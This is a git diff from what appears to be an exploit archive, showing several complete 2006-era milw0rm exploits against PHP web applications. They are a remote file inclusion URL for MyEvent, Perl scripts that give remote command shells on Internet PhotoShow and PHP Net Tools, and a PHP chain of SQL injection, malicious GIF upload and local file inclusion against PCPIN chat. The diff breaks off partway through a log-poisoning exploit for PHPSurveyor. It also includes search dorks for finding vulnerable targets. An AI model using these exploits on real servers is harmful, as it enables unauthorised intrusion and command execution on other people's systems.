@@ -1,10 +1,10 @@
-Script : MyEvent
-Version : 1.2
-Risk : High
-Class : Remote
-Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
-Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php" 
-
-http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a 
-
-# milw0rm.com [2006-04-17]
+Script : MyEvent
+Version : 1.2
+Risk : High
+Class : Remote
+Credits : b3g0k,Nistiman,flot,Netqurd etc.. my forget other friends
+Google look for :) = "MyEvent 1.2 " or "/calendar/myevent.php" 
+
+http://www.site.com/[path]/event.php?myevent_path=http://www.site.com/x.txt?&cmd=uname -a 
+
+# milw0rm.com [2006-04-17]
diff --git a/platforms/php/webapps/1694.pl b/platforms/php/webapps/1694.pl
index 2d1195c33..743ffc059 100755
--- a/platforms/php/webapps/1694.pl
+++ b/platforms/php/webapps/1694.pl
@@ -1,83 +1,83 @@
-#!/usr/bin/perl
-#
-# Exploit by Hessam-x (www.hessamx.net)
-# sub usage()
-# {
- #print " Usage: perl hx.pl [host] [cmd shell] [cmd shell variable]\r\n\n";
- #print " example : perl hx.pl www.milw0rm.com milw0rm.com/hx.txt cmd";
- #exit();
- #}
-######################################################
-#  ___ ___                __                         #
-# /   |   \_____    ____ |  | __ ___________________ #
-#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
-#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
-# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
-#       \/      \/     \/     \/    \/            \/ #
-#             Iran Hackerz Security Team             #
-#               WebSite: www.hackerz.ir              #
-#                 DeltaHAcking Team                  #
-#           website: www.deltahacking.com            #
-######################################################
-#  Internet PhotoShow Remote File Inclusion Exploit  #
-######################################################
-# upload a shell with this xpl:
-# wget http://shell location/
-use LWP::UserAgent;
-print "-------------------------------------------\n";
-print "=             Internet PhotoShow          =\n";
-print "=       By Hessam-x  - www.hackerz.ir     =\n";
-print "-------------------------------------------\n\n";
-
-
-$bPath = $ARGV[0];
-$cmdo = $ARGV[1];
-$bcmd = $ARGV[2];
-
-if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}
-
-
-
-while()
-{
-       print "Hessam-x@PhotoShow \$";
-while()
-       {
-               $cmd=$_;
-               chomp($cmd);
-
-$xpl = LWP::UserAgent->new() or die;
-$req = HTTP::Request->new(GET =>$bpath.'index.php?page='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n[-] Could not connect !\n";
-
-$res = $xpl->request($req);
-
-$return = $res->content;
-$return =~ tr/[\n]/[ê]/;
-
-if (!$cmd) {print "\n[!] Please type a Command\n\n"; $return ="";}
-
-elsif ($return =~/failed to open stream: HTTP request failed!/)
-       {print "\n[-] Could Not Connect to cmd Host\n";exit}
-elsif ($return =~/^Fatal.error/) {print "\n[-] Invalid Command\n"}
-
-if($return =~ /(.*)/)
-
-
-{
-       $freturn = $1;
-       $freturn=~ tr/[ê]/[\n]/;
-       print "\r\n$freturn\n\r";
-       last;
-}
-
-else {print "Hessam-x@PhotoShow \$";}}}last;
-
-
-sub usage()
- {
-print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell variable]\n";
-print " - E.g : hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd\n";
- exit();
- }
-
-# milw0rm.com [2006-04-18]
+#!/usr/bin/perl
+#
+# Exploit by Hessam-x (www.hessamx.net)
+# sub usage()
+# {
+ #print " Usage: perl hx.pl [host] [cmd shell] [cmd shell variable]\r\n\n";
+ #print " example : perl hx.pl www.milw0rm.com milw0rm.com/hx.txt cmd";
+ #exit();
+ #}
+######################################################
+#  ___ ___                __                         #
+# /   |   \_____    ____ |  | __ ___________________ #
+#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
+#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
+# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
+#       \/      \/     \/     \/    \/            \/ #
+#             Iran Hackerz Security Team             #
+#               WebSite: www.hackerz.ir              #
+#                 DeltaHAcking Team                  #
+#           website: www.deltahacking.com            #
+######################################################
+#  Internet PhotoShow Remote File Inclusion Exploit  #
+######################################################
+# upload a shell with this xpl:
+# wget http://shell location/
+use LWP::UserAgent;
+print "-------------------------------------------\n";
+print "=             Internet PhotoShow          =\n";
+print "=       By Hessam-x  - www.hackerz.ir     =\n";
+print "-------------------------------------------\n\n";
+
+
+$bPath = $ARGV[0];
+$cmdo = $ARGV[1];
+$bcmd = $ARGV[2];
+
+if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}
+
+
+
+while()
+{
+       print "Hessam-x@PhotoShow \$";
+while()
+       {
+               $cmd=$_;
+               chomp($cmd);
+
+$xpl = LWP::UserAgent->new() or die;
+$req = HTTP::Request->new(GET =>$bpath.'index.php?page='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n[-] Could not connect !\n";
+
+$res = $xpl->request($req);
+
+$return = $res->content;
+$return =~ tr/[\n]/[ê]/;
+
+if (!$cmd) {print "\n[!] Please type a Command\n\n"; $return ="";}
+
+elsif ($return =~/failed to open stream: HTTP request failed!/)
+       {print "\n[-] Could Not Connect to cmd Host\n";exit}
+elsif ($return =~/^Fatal.error/) {print "\n[-] Invalid Command\n"}
+
+if($return =~ /(.*)/)
+
+
+{
+       $freturn = $1;
+       $freturn=~ tr/[ê]/[\n]/;
+       print "\r\n$freturn\n\r";
+       last;
+}
+
+else {print "Hessam-x@PhotoShow \$";}}}last;
+
+
+sub usage()
+ {
+print "[!] Usage : hx.pl [host] [cmd shell location] [cmd shell variable]\n";
+print " - E.g : hx.pl http://www.milw0rm.com http://www.milw0rm.com/shell.txt cmd\n";
+ exit();
+ }
+
+# milw0rm.com [2006-04-18]
diff --git a/platforms/php/webapps/1695.pl b/platforms/php/webapps/1695.pl
index 94f49c11f..2fb3a310c 100755
--- a/platforms/php/webapps/1695.pl
+++ b/platforms/php/webapps/1695.pl
@@ -1,52 +1,52 @@
-#!/usr/bin/perl
-# PHP Net Tools Remote Code Execution Exploit
-#
-# by FOX_MULDER (fox_mulder@abv.bg)
-# Vulnerability found by FOX_MULDER.
-#
-# "Born to be root !!!"
-#----------------------------------+
-#PHP Net Tools                     |
-#Copyright (C) 2005 Eric Robertson |
-#h4rdc0d3@gmail.com                |
-#----------------------------------+
-#
-# Fact:Wbyte counted twice to infinity !!!
-#
-#
-###################################################
-	use LWP 5.64;
-
-	my $hostname = $ARGV[0];
-	my $dir = $ARGV[1];
-	my $command = $ARGV[2];
-
-        if (@ARGV<2) {
-	print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n";
-	exit();
-	}
-	
-	print "=======================================================\n";
-	print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n";
-	print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n";
-	print "fox_mulder@abv.bg\r\n";
-	print "=======================================================\n";
-
-	my $browser = LWP::UserAgent->new;
-	$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
-	print "\n\n[+]Sending request to server . . .\r\n";
-	
-	my $url = "http://$hostname$dir/nettools.php";
-
-	
-	my $response = $browser->post( $url,[
-		'ping' => '1',
-        	'host' => "|$command"]);
-
- 	my $code = $response->status_line;
-        print "[+] HTTP RESPONSE $code\n";
-        print "\n[+]Injecting command . . .\n";
-	$response->content =~ /blockquote>(.*)<\/blockquote>/s;
-	print "$1\n";
-
-# milw0rm.com [2006-04-18]
+#!/usr/bin/perl
+# PHP Net Tools Remote Code Execution Exploit
+#
+# by FOX_MULDER (fox_mulder@abv.bg)
+# Vulnerability found by FOX_MULDER.
+#
+# "Born to be root !!!"
+#----------------------------------+
+#PHP Net Tools                     |
+#Copyright (C) 2005 Eric Robertson |
+#h4rdc0d3@gmail.com                |
+#----------------------------------+
+#
+# Fact:Wbyte counted twice to infinity !!!
+#
+#
+###################################################
+	use LWP 5.64;
+
+	my $hostname = $ARGV[0];
+	my $dir = $ARGV[1];
+	my $command = $ARGV[2];
+
+        if (@ARGV<2) {
+	print "\nUsage: ntools.pl www.site.com /dir/ \"ls \-la\" \n";
+	exit();
+	}
+	
+	print "=======================================================\n";
+	print "0day 0day 0day 0day 0day 0day 0day 0day 0day 0day 0day\n";
+	print "PHP Net Tools Command Execution Exploit by FOX_MULDER\n";
+	print "fox_mulder@abv.bg\r\n";
+	print "=======================================================\n";
+
+	my $browser = LWP::UserAgent->new;
+	$browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
+	print "\n\n[+]Sending request to server . . .\r\n";
+	
+	my $url = "http://$hostname$dir/nettools.php";
+
+	
+	my $response = $browser->post( $url,[
+		'ping' => '1',
+        	'host' => "|$command"]);
+
+ 	my $code = $response->status_line;
+        print "[+] HTTP RESPONSE $code\n";
+        print "\n[+]Injecting command . . .\n";
+	$response->content =~ /blockquote>(.*)<\/blockquote>/s;
+	print "$1\n";
+
+# milw0rm.com [2006-04-18]
diff --git a/platforms/php/webapps/1697.php b/platforms/php/webapps/1697.php
index 6221dc06f..6928278ce 100755
--- a/platforms/php/webapps/1697.php
+++ b/platforms/php/webapps/1697.php
@@ -1,266 +1,266 @@
-#!/usr/bin/php -q -d short_open_tag=on
- works with magic_quotes_gpc = Off\r\n";
-echo "dork: \"powered by PCPIN.com\"\r\n\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to pcpin\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /pcpin/ cat ./config/db.inc.php\r\n";
-echo "php ".$argv[0]." localhost /pcpin/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-/*
-   software site: http://www.pcpin.com/
-   description: a chat software written in php that uses mysql for data storage
-
-   vulnerabilites:
-   i) sql injection:
-   you can login as admin typing:
-   username: ") or isnull(1/0)/*
-   password: [whatever]
-
-   query becomes:
-   SELECT * FROM pcpin_user WHERE (cookie = "#EMPTY#" AND cookie <> "") OR
-   (login = "") or isnull(1/0)/* AND password = "[somehash]") AND activated = "1"
-   LIMIT 1
-
-   ii) arbitrary local inclusion:
-   now you can upload smilies with php code inside, we have a local inclusion
-   bug in "language" argument when you select a language so, you can include
-   a gif file and launch commands...
-
-   both works with magic_quotes_gpc=Off
-                       							      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-function make_seed()
-{
-   list($usec, $sec) = explode(' ', microtime());
-   return (float) $sec + ((float) $usec * 100000);
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-
-#step 1 -> sql injection, login as admin
-echo "[1] login...\r\n";
-$sql="\") or isnull(1/0)/*";
-$sql=urlencode($sql);
-$data ="lostpassword=";
-$data.="&include=2";
-$data.="&language=english";
-$data.="&submitted=1";
-$data.="&login=".$sql;
-$data.="&password=suntzu";
-$packet ="POST ".$p."main.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Accept: text/plain\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-$temp=explode("Set-Cookie: ",$html);
-$temp2=explode(" ",$temp[1]);
-$cookie=$temp2[0];
-if ($cookie =='') {die("Unable to retrieve session cookie...");}
-echo "Cookie -> ".$cookie."\r\n";
-$temp=explode("name=\"session_id\" value=\"",$html);
-$temp2=explode("\"",$temp[1]);
-$sid=$temp2[0];
-if ($sid =='') {die("Unable to retrieve session id...");}
-echo "session id -> ".$sid."\r\n";
-
-srand(make_seed());
-$v = rand(1,99999);
-
-#step 2 -> Upload a malicious gif file...
-echo "[2] uploading the gif file...\r\n";
-$data='-----------------------------7d613b1d0448
-Content-Disposition: form-data; name="smiliefile"; filename="suntzu.gif"
-Content-Type: image/gif
-
-
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="session_id";
-
-'.$sid.'
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="include";
-
-26
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="text";
-
-suntzu'.$v.'
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="smilie_id"
-
-
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="add"
-
-1
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="edit"
-
-
------------------------------7d613b1d0448
-Content-Disposition: form-data; name="submitted"
-
-1
------------------------------7d613b1d0448--
-';
-
-
-$packet ="POST ".$p."main.php HTTP/1.0\r\n";
-$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-//echo $html;
-$temp=explode("smilies/",$html); //file is renamed, let's retrieve new filename...it is the last in smilies list
-$temp2=explode("\"",$temp[count($temp)-1]);
-$fn=$temp2[0];
-if ($fn =='') {die("Unable to retrieve evil gif filename...");}
-echo "filename -> ".$fn."\r\n";
-
-#step 3-> logout... you need this to launch again exploit
-echo "[3] logout...\r\n";
-$data="session_id=".$sid."&include=9";
-$packet ="POST ".$p."main.php HTTP/1.0\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n";
-$packet.="Cookie: ".$cookie."\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-if (strstr($html,"window.location.href")) {echo "done...\r\n";}
-                                     else {echo "maybe not...\r\n";}
-
-#step 4-> launch commands
-echo "[4] sending command...\r\n";
-$xpl=urlencode("../images/smilies/".$fn.chr(0x00));
-$data="language=".$xpl;
-$packet ="POST ".$p."main.php HTTP/1.0\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
-$packet.="Cookie: suntzu=".$cmd.";\r\n"; //pass commands through cookies
-$packet.="Content-Length: ".strlen($data)."\r\n";
-$packet.="Connection: Close\r\n\r\n";
-$packet.=$data;
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-  if (strstr($html,"56789"))
-  {
-   echo "Exploit succeeded...\r\n\r\n";
-   $temp=explode("56789",$html);
-   die($temp[1]);
-  }
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-04-19]
+#!/usr/bin/php -q -d short_open_tag=on
+ works with magic_quotes_gpc = Off\r\n";
+echo "dork: \"powered by PCPIN.com\"\r\n\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to pcpin\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /pcpin/ cat ./config/db.inc.php\r\n";
+echo "php ".$argv[0]." localhost /pcpin/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+/*
+   software site: http://www.pcpin.com/
+   description: a chat software written in php that uses mysql for data storage
+
+   vulnerabilites:
+   i) sql injection:
+   you can login as admin typing:
+   username: ") or isnull(1/0)/*
+   password: [whatever]
+
+   query becomes:
+   SELECT * FROM pcpin_user WHERE (cookie = "#EMPTY#" AND cookie <> "") OR
+   (login = "") or isnull(1/0)/* AND password = "[somehash]") AND activated = "1"
+   LIMIT 1
+
+   ii) arbitrary local inclusion:
+   now you can upload smilies with php code inside, we have a local inclusion
+   bug in "language" argument when you select a language so, you can include
+   a gif file and launch commands...
+
+   both works with magic_quotes_gpc=Off
+                       							      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+function make_seed()
+{
+   list($usec, $sec) = explode(' ', microtime());
+   return (float) $sec + ((float) $usec * 100000);
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+
+#step 1 -> sql injection, login as admin
+echo "[1] login...\r\n";
+$sql="\") or isnull(1/0)/*";
+$sql=urlencode($sql);
+$data ="lostpassword=";
+$data.="&include=2";
+$data.="&language=english";
+$data.="&submitted=1";
+$data.="&login=".$sql;
+$data.="&password=suntzu";
+$packet ="POST ".$p."main.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Accept: text/plain\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+$temp=explode("Set-Cookie: ",$html);
+$temp2=explode(" ",$temp[1]);
+$cookie=$temp2[0];
+if ($cookie =='') {die("Unable to retrieve session cookie...");}
+echo "Cookie -> ".$cookie."\r\n";
+$temp=explode("name=\"session_id\" value=\"",$html);
+$temp2=explode("\"",$temp[1]);
+$sid=$temp2[0];
+if ($sid =='') {die("Unable to retrieve session id...");}
+echo "session id -> ".$sid."\r\n";
+
+srand(make_seed());
+$v = rand(1,99999);
+
+#step 2 -> Upload a malicious gif file...
+echo "[2] uploading the gif file...\r\n";
+$data='-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="smiliefile"; filename="suntzu.gif"
+Content-Type: image/gif
+
+
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="session_id";
+
+'.$sid.'
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="include";
+
+26
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="text";
+
+suntzu'.$v.'
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="smilie_id"
+
+
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="add"
+
+1
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="edit"
+
+
+-----------------------------7d613b1d0448
+Content-Disposition: form-data; name="submitted"
+
+1
+-----------------------------7d613b1d0448--
+';
+
+
+$packet ="POST ".$p."main.php HTTP/1.0\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d613b1d0448\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+//echo $html;
+$temp=explode("smilies/",$html); //file is renamed, let's retrieve new filename...it is the last in smilies list
+$temp2=explode("\"",$temp[count($temp)-1]);
+$fn=$temp2[0];
+if ($fn =='') {die("Unable to retrieve evil gif filename...");}
+echo "filename -> ".$fn."\r\n";
+
+#step 3-> logout... you need this to launch again exploit
+echo "[3] logout...\r\n";
+$data="session_id=".$sid."&include=9";
+$packet ="POST ".$p."main.php HTTP/1.0\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+if (strstr($html,"window.location.href")) {echo "done...\r\n";}
+                                     else {echo "maybe not...\r\n";}
+
+#step 4-> launch commands
+echo "[4] sending command...\r\n";
+$xpl=urlencode("../images/smilies/".$fn.chr(0x00));
+$data="language=".$xpl;
+$packet ="POST ".$p."main.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
+$packet.="Cookie: suntzu=".$cmd.";\r\n"; //pass commands through cookies
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+$packet.=$data;
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+  if (strstr($html,"56789"))
+  {
+   echo "Exploit succeeded...\r\n\r\n";
+   $temp=explode("56789",$html);
+   die($temp[1]);
+  }
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-04-19]
diff --git a/platforms/php/webapps/1701.php b/platforms/php/webapps/1701.php
index 55bbfaa12..626e3ab22 100755
--- a/platforms/php/webapps/1701.php
+++ b/platforms/php/webapps/1701.php
@@ -1,207 +1,207 @@
-#!/usr/bin/php -q -d short_open_tag=on
- works regardless of magic_quotes gpc settings                 *\r\n";
-echo "*    with at least one row in 'surveys' table                      *\r\n";
-echo "*    and if we succeed to include logs                             *\r\n";
-echo "********************************************************************\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to PHPSurveyor\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /surveyor/ cat config.php\r\n";
-echo "php ".$argv[0]." localhost /surveyor/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "[1] Injecting some code in log files ...\r\n\r\n";
-$CODE="";
-$packet="GET ".$p.$CODE." HTTP/1.0\r\n";
-$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: close\r\n\r\n";
-sendpacketii($packet);
-sleep(3);
-
-//fill with possible locations...
-$paths=array(
-"../../../../../../../../../../var/log/httpd/access_log",
-"../../../../../../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../../../../../../apache/logs/error.log",
-"../../../../../../apache/logs/access.log",
-"../logs/error.log",
